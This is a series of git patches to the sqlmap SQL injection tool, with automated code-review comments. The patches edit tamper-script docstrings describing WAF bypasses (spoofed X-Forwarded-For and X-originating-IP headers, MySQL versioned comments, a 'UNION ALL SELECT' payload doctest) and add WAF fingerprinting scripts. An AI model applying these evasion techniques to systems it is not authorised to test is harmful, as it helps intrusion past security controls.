diff --git a/tamper/unionalltounion.py b/tamper/unionalltounion.py index f5d759412e4..46e00447eb4 100644 --- a/tamper/unionalltounion.py +++ b/tamper/unionalltounion.py @@ -14,7 +14,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces UNION ALL SELECT with UNION SELECT + Replaces instances of UNION ALL SELECT with UNION SELECT counterpart >>> tamper('-1 UNION ALL SELECT') '-1 UNION SELECT' diff --git a/tamper/uppercase.py b/tamper/uppercase.py index 64382c4e122..71aeba794cf 100644 --- a/tamper/uppercase.py +++ b/tamper/uppercase.py @@ -17,7 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with upper case value + Replaces each keyword character with upper case value (e.g. select -> SELECT) Tested against: * Microsoft SQL Server 2005 diff --git a/tamper/varnish.py b/tamper/varnish.py index fdc6fb09bad..b0b020e7ebd 100644 --- a/tamper/varnish.py +++ b/tamper/varnish.py @@ -14,12 +14,12 @@ def dependencies(): def tamper(payload, **kwargs): """ - Append a HTTP header 'X-originating-IP' to bypass - WAF Protection of Varnish Firewall + Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall - Notes: - Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + Reference: + * http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366 + Notes: Examples: >> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X) >> X-remote-IP: TARGET_PROXY_IP (184.189.250.X) diff --git a/tamper/versionedkeywords.py b/tamper/versionedkeywords.py index 920d88d18fc..31524e60855 100644 --- a/tamper/versionedkeywords.py +++ b/tamper/versionedkeywords.py 
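Review bot: The new varnish.py docstring leaves a bare `Notes:` heading immediately followed by `Examples:`, so the section reads as a leftover from the old layout in which `Notes:` introduced the reference. Either drop the empty `Notes:` line or fold the example lines under it (`Notes:` / `* Examples:` ...), in the same bulleted style this hunk already applies to the `Reference:` block. The docstring and the `tamper()` body continue outside the hunk.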
@@ -20,7 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each non-function keyword with versioned MySQL comment + Encloses each non-function keyword with (MySQL) versioned comment Requirement: * MySQL diff --git a/tamper/versionedmorekeywords.py b/tamper/versionedmorekeywords.py index 1fe5adf5636..d8480814724 100644 --- a/tamper/versionedmorekeywords.py +++ b/tamper/versionedmorekeywords.py @@ -21,7 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Encloses each keyword with versioned MySQL comment + Encloses each keyword with (MySQL) versioned comment Requirement: * MySQL >= 5.1.13 diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index 4374a4862b1..6cd5c81131b 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -20,8 +20,7 @@ def randomIP(): def tamper(payload, **kwargs): """ - Append a fake HTTP header 'X-Forwarded-For' to bypass - WAF (usually application based) protection + Append a fake HTTP header 'X-Forwarded-For' """ headers = kwargs.get("headers", {}) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27f9d2297b4..65185f6f709 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -af0c5caaa6328319a682073afa93ec84 lib/core/common.py +ee1b800e860263b877a2b292a3e4becd lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
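Review bot: The rewritten summary in xforwardedfor.py, `Append a fake HTTP header 'X-Forwarded-For'`, drops the only sentence that said why the header is added (bypassing WAF protection), which is presumably the text shown by the new `--list-tampers` option. I would keep the purpose in the one-line form used elsewhere in this series, e.g. `Append a fake HTTP header 'X-Forwarded-For' (e.g. to bypass (application based) WAF protection)`. The rest of `tamper()` is outside the hunk.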
@@ -40,15 +40,15 @@ ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -13c0a490b5a928b64236b4a15e578267 lib/core/optiondict.py -c82dee0f62e729213b92f5ec85f74b70 lib/core/option.py +05f72baa2db4073bb0273d7fc1df13eb lib/core/optiondict.py +8e759d4c8711a5980d4bdc2d044a4fd4 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ec2adffae2982c11332c573fe4e68d6d lib/core/settings.py +b0c61c78049b4e342aeafd2fc85430fe lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -bc34167c7accc61df07b2982cddd0338 lib/parse/cmdline.py +babf5c48bc6a3797fc459706af4465cd lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 
@@ -228,16 +228,16 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py a35b5b83c12841fdf3925190c9d24299 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py -4e6956958ef8135cd543d7a57f2e73ff tamper/apostrophemask.py -7c838eadd96b20800ba0bd394f5014f0 tamper/apostrophenullencode.py -0d7e8a3a0e17c92d51c49415884a47c9 tamper/appendnullbyte.py -0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py +3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py +d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py +a14420ef43cdeb8fbc091116d31d31f1 tamper/appendnullbyte.py +cfe19908ec32e3f2e113e759705f986b tamper/base64encode.py e77a89b2af931a1820f6ba4b86d19cd4 tamper/between.py -e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py -1807417f8a7fc0bb30c36ead458da0c8 tamper/chardoubleencode.py -043c97c7b214335838a6bb15eeedcba3 tamper/charencode.py -0c0d0e5d0caf4258a75112ab59fa3e75 tamper/charunicodeencode.py -18b2ca09390686f895c3bbd6460ac034 tamper/charunicodeescape.py +9df0a1810a27b92eec1375d19a95b7ef tamper/bluecoat.py +8c174b8925f4f075010b04d85c02a169 tamper/chardoubleencode.py +45174c61533f464806f4454be6a3f2d6 tamper/charencode.py +0aadf3e93dd72a9b94cb6532b3343dd1 tamper/charunicodeencode.py +014f352771f0c1fb9e0f5397c5a03dc3 tamper/charunicodeescape.py 6c618b9310ed5c8de93c927e920b1d31 tamper/commalesslimit.py 50f6532870d2e109bf46468e8d3ded49 tamper/commalessmid.py 4951fec0a1af043e4b9c0728882d3452 tamper/commentbeforeparentheses.py 
@@ -247,44 +247,44 @@ e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py 6124bc647bfa04f2b16ff8cad98382d4 tamper/halfversionedmorekeywords.py ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py -3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py -e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -4615cbeff722583e7ab3dbe774e38c93 tamper/informationschemacomment.py +42f232d776065e325e862867c522c523 tamper/ifnull2casewhenisnull.py +6e3ab1cf4ccf5524dcb60e390f920b60 tamper/ifnull2ifisnull.py +3ed2c6299c7c94776306535ff6090ab3 tamper/informationschemacomment.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py efd1917c6ccc632f044084a30e0e0f98 tamper/nonrecursivereplacement.py -95bf07047343c68a05658f5f11c6b413 tamper/overlongutf8more.py -db4687249dedddbe057c8b163923ef01 tamper/overlongutf8.py -bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -db9cd6325d1814e5fe88323fe4add4e1 tamper/plus2concat.py -bcad55e2f7ce3e58a4cc7fcef77d4a4a tamper/plus2fnconcat.py -e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py -e50d9ed1c988638899cf82f18452e96c tamper/randomcomments.py +dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py +a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py +89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py +a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py +759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py +078494e1217400b485ef653108d32699 tamper/randomcase.py +28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py 938bfac6e55a8823e4a66cd29166d980 tamper/securesphere.py cac8a56f8cc6c14524ee392daa5ae2fd 
tamper/space2comment.py -62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py -ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py -18f827afce8322adfa0c6dfbb4a59379 tamper/space2morecomment.py -59e61a9dd1f1e6b79fde026ed771cac4 tamper/space2morehash.py -ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py -74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py -fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py -48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py +4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py +7cdbae483262f66ef5d77521c59d9621 tamper/space2hash.py +f3fed47a4fccb2b482f1f01559b8f55a tamper/space2morecomment.py +fc3d9896cac8f4a97efd39673fadca7b tamper/space2morehash.py +b55ed15af74ffefc4dc303646c7c6482 tamper/space2mssqlblank.py +64e3d97e22f7e0870e88a87fd2f64243 tamper/space2mssqlhash.py +3ef95855a38bbc0f031ae3a992dcbf52 tamper/space2mysqlblank.py +8a4737f853354ac9c3788278589a772a tamper/space2mysqldash.py 72a547bc3bf32dba0d1c3093988df8af tamper/space2plus.py -6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py +a74cd6375c5d5d253e2e7014b00ecd33 tamper/space2randomblank.py 93fc10b57586936cef05e88227c84ad0 tamper/sp_password.py 041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py -6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py +6679c4ffb7322315a738dcfa68c6fb7c tamper/unionalltounion.py 51d20b5cb5a50fc2e44d39087f865d23 tamper/unmagicquotes.py -371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py -557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py -929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py -3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py -ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py +cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py +f2b9eac52d346315f5705f71beeda791 tamper/varnish.py +0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py +0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py +de532c4e3160039335010c499129d54f 
tamper/xforwardedfor.py b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py From af89137f2cbe54cb7b0f77a2997ce9cf6bf2e46e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 5 Aug 2018 14:19:27 +0200 Subject: [PATCH 221/428] Update of WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 10 ++++++---- waf/cloudflare.py | 2 +- waf/distil.py | 24 ++++++++++++++++++++++++ waf/incapsula.py | 1 + waf/reblaze.py | 25 +++++++++++++++++++++++++ waf/sucuri.py | 2 ++ 7 files changed, 60 insertions(+), 6 deletions(-) create mode 100644 waf/distil.py create mode 100644 waf/reblaze.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 93ae43a1f30..3e54a786d8d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.28" +VERSION = "1.2.8.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 65185f6f709..f349a738e45 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b0c61c78049b4e342aeafd2fc85430fe lib/core/settings.py +355a1680a1f53013390849ca50322c0e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 
@@ -402,11 +402,12 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py +feda0f2a5172325f39e8e3e38c45f73d waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py +0182d23b34cf903537f77f4ec4b144bf waf/distil.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py 7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py @@ -414,7 +415,7 @@ aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py 1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -525483047474e6f15d9898b525bdafd3 waf/incapsula.py +2a52c09e4ce1f2a5976ce53b415ef496 waf/incapsula.py 1e5532ede194ac9c083891c2f02bca93 waf/__init__.py 30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py @@ -430,6 +431,7 @@ ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py 856e34d47fedfe96039a6a7807f9605a waf/profense.py 166eb53544536e3e86223d513b8b688d waf/proventia.py 78a40eca7ddd14c4eaf911de7748b487 waf/radware.py +67864bf5e5a38cb27b5daf3581282f9e waf/reblaze.py f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py acb82b21f4032ceb510a58142add02ab waf/safe3.py 67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py 
@@ -439,7 +441,7 @@ d1b67820442199181815ec3fce27e582 waf/secureiis.py
b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py
4c412bc70007e6108d109e2911f2cefe waf/sophos.py
0e244e097a648158948dc8bb2351c781 waf/stingray.py
-d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py
+9da254a2dfe22539c90bc1db0643489e waf/sucuri.py
46224e3fa4b819da227c50fd45155823 waf/tencent.py
dffa9cebad777308714aaf83b71635b4 waf/teros.py
b37210459a13de40bf07722c4d032c33 waf/trafficshield.py
diff --git a/waf/cloudflare.py b/waf/cloudflare.py
index 5712f0957f7..7e738bb4726 100644
--- a/waf/cloudflare.py
+++ b/waf/cloudflare.py
@@ -17,7 +17,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
- retval = re.search(r"cloudflare-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+ retval = re.search(r"cloudflare", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if code >= 400:
retval |= re.search(r"\A__cfduid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
diff --git a/waf/distil.py b/waf/distil.py
new file mode 100644
index 00000000000..25e1908d865
--- /dev/null
+++ b/waf/distil.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Distil Web Application Firewall Security (Distil Networks)"
+
+def detect(get_page):
+ retval = False
+
+ for vector in WAF_ATTACK_VECTORS:
+ _, headers, _ = get_page(get=vector)
+ retval = headers.get("x-distil-cs") is not None
+ if retval:
+ break
+
+ return retval
diff --git a/waf/incapsula.py b/waf/incapsula.py
index f2bc0b5de7b..e08ba65df8f 100644
--- a/waf/incapsula.py
+++ b/waf/incapsula.py
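Review bot: `import re` and `from lib.core.enums import HTTP_HEADER` in the new waf/distil.py are never used — `detect()` only calls `headers.get("x-distil-cs")` — so both lines should be dropped; they look copied over from the sibling scripts. The header name is also written in lower case while the other scripts use the vendor's casing (`X-CDN`, `X-Iinfo`, `X-Sucuri-ID`); that is harmless only if `headers.get` is case-insensitive, which the hunk does not show, so worth confirming against how `headers` is built, otherwise the lookup silently misses the header. The `__product__`/`detect()` shape otherwise matches the existing scripts.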
@@ -20,6 +20,7 @@ def detect(get_page):
retval = re.search(r"incap_ses|visid_incap", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"Incapsula", headers.get("X-CDN", ""), re.I) is not None
retval |= "Incapsula incident ID" in (page or "")
+ retval |= headers.get("X-Iinfo") is not None
if retval:
break
diff --git a/waf/reblaze.py b/waf/reblaze.py
new file mode 100644
index 00000000000..6226f4fca7f
--- /dev/null
+++ b/waf/reblaze.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "Reblaze Web Application Firewall (Reblaze)"
+
+def detect(get_page):
+ retval = False
+
+ for vector in WAF_ATTACK_VECTORS:
+ _, headers, _ = get_page(get=vector)
+ retval = re.search(r"\Arbzid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
+ retval |= re.search(r"Reblaze Secure Web Gateway", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+ if retval:
+ break
+
+ return retval
diff --git a/waf/sucuri.py b/waf/sucuri.py
index 7b1eb4cc8b7..636008f74d2 100644
--- a/waf/sucuri.py
+++ b/waf/sucuri.py
@@ -21,6 +21,8 @@ def detect(get_page):
retval |= "Access Denied - Sucuri Website Firewall" in (page or "")
retval |= "Sucuri WebSite Firewall - CloudProxy - Access Denied" in (page or "")
retval |= re.search(r"Questions\?.+cloudproxy@sucuri\.net", (page or "")) is not None
+ retval |= headers.get("X-Sucuri-ID") is not None
+ retval |= headers.get("X-Sucuri-Cache") is not None
if retval:
break
From b0ca52086a1aa6c71797c429a4f827dd70146766 Mon Sep 17 00:00:00 2001
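Review bot: In the new waf/reblaze.py, `re.search(r"\Arbzid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I)` only matches when `rbzid` is the first cookie in the Set-Cookie value; if the response sets other cookies first, or several Set-Cookie headers are joined into one value by the HTTP library, the cookie check silently fails and detection falls back to the Server-header string alone. The same `\A` anchoring is used by `\A__cfduid=` in cloudflare.py, so this is consistent with the existing scripts, but a boundary such as `(?:\A|[;,]\s*)rbzid=` would be more robust — worth confirming against how `headers` is built before changing it.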
From: Miroslav Stampar Date: Tue, 7 Aug 2018 23:35:58 +0200 Subject: [PATCH 222/428] Fixes #3202 --- lib/core/common.py | 6 +++--- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 885cdaac53d..c1271be4c52 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2908,15 +2908,15 @@ def filterStringValue(value, charRegex, replacement=""): return retVal -def filterControlChars(value): +def filterControlChars(value, replacement=' '): """ - Returns string value with control chars being supstituted with ' ' + Returns string value with control chars being supstituted with replacement character >>> filterControlChars(u'AND 1>(2+3)\\n--') u'AND 1>(2+3) --' """ - return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') + return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement) def isDBMSVersionAtLeast(version): """ diff --git a/lib/core/settings.py b/lib/core/settings.py index 3e54a786d8d..592795b7fa7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.0" +VERSION = "1.2.8.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 4dca1afb4e2..484666e0cfe 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py 
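Review bot: The new docstring line of `filterControlChars` still carries the typo `supstituted`, and it now says "replacement character" although `replacement` is passed straight through to `filterStringValue` and may be any string (default `' '`). I would write `Returns string value with control chars being substituted with the given replacement string (default: ' ')` and add a doctest for the new parameter, e.g. `>>> filterControlChars(u'AND 1>(2+3)\\n--', replacement='_')` expecting `u'AND 1>(2+3)_--'`, assuming `filterStringValue` substitutes each non-matching character as the existing doctest suggests.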
@@ -501,7 +501,7 @@ def blindThread(): count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): - output += '_' if currentValue[i] is None else currentValue[i] + output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ') for i in xrange(length): count += 1 if currentValue[i] is not None else 0 @@ -518,7 +518,7 @@ def blindThread(): status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) output += status if _ != length else " " * len(status) - dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) + dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) runThreads(numThreads, blindThread, startThreadMsg=False) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f349a738e45..7330bb9d544 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ee1b800e860263b877a2b292a3e4becd lib/core/common.py +655326aed648209c5477464825cebea8 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -355a1680a1f53013390849ca50322c0e lib/core/settings.py +63ca523cd15143c4c0dc1ee2d307dfa6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 
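Review bot: `replacement=' '` on the new line is redundant now that it is the default of `filterControlChars`, and the inner conditional `currentValue[i] if len(currentValue[i]) == 1 else ' '` silently blanks any multi-character entry without saying why; `len()` also assumes every non-None entry is a string, which the hunk does not show. I would drop the keyword and put the reason in a comment (presumably to keep one display column per retrieved character — confirm), e.g. `# entries that are not a single character are displayed as a blank to keep the progress line aligned` above `output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ')`. `blindThread()` starts and ends outside the hunk.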
@@ -89,7 +89,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py -0e9d37cbeabd1bbbfe2c53f01bbb6a6e lib/techniques/blind/inference.py +db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py From df977d93d481d2ce48ca85071cc1a47009b66bbe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 9 Aug 2018 15:08:21 +0200 Subject: [PATCH 223/428] Fixes #3204 --- lib/core/settings.py | 4 ++-- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 592795b7fa7..7e0ec6ca79e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.1" +VERSION = "1.2.8.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -406,7 +406,7 @@ REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" # Regular expression used for replacing non-alphanum characters -REFLECTED_REPLACEMENT_REGEX = r".+" +REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}" # Maximum time (in seconds) spent per reflective value(s) replacement REFLECTED_REPLACEMENT_TIMEOUT = 3 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7330bb9d544..fe043b2641c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
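Review bot: The new `REFLECTED_REPLACEMENT_REGEX` bounds a match to at most 100 non-newline characters, but the comment above it (`# Regular expression used for replacing non-alphanum characters`) no longer describes what the pattern does and the reason for the bound is not recorded. I would change it to `# Regular expression used for matching reflected value(s) (bounded to 100 non-newline characters; the former unbounded ".+" could swallow the rest of a line)`, adjusting the parenthetical if the actual motivation in #3204 differs. The code that applies this pattern is outside the hunk, so whether the 100-character cap can truncate a legitimately longer reflection cannot be judged here; the remaining hunks in this commit are a version bump and a checksum update.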
